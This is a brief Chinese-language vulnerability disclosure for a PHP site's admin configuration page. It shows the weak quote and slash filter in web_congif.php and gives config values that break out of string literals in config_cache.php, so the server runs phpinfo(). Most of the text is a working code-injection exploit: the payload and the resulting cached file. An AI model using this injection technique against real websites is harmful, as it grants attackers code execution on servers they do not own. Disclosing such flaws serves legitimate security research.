漏洞作者: 蓝蓝
admin/web_congif.php 的过滤代码如下。
[php]
//强制去掉 '
//强制去掉最后一位 /
$vartmp = str_replace("'",'',$row['varvalue']);
if(substr($vartmp, -1) == '//')
{
$vartmp = substr($vartmp,1,-1);
}
[/php]
只过滤了最后一位的反斜杠,只需要加两个反斜杠就可以了·····
首先修改网站配置信息
config_cache.php中会变成这样
[php]
$cfg_webname = '的网站/';
$cfg_weburl = ';/*http://127.0.0.1';
$cfg_webpath = '*/phpinfo();#';
$cfg_author = '';
[/php]
php代码就会被执行了。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论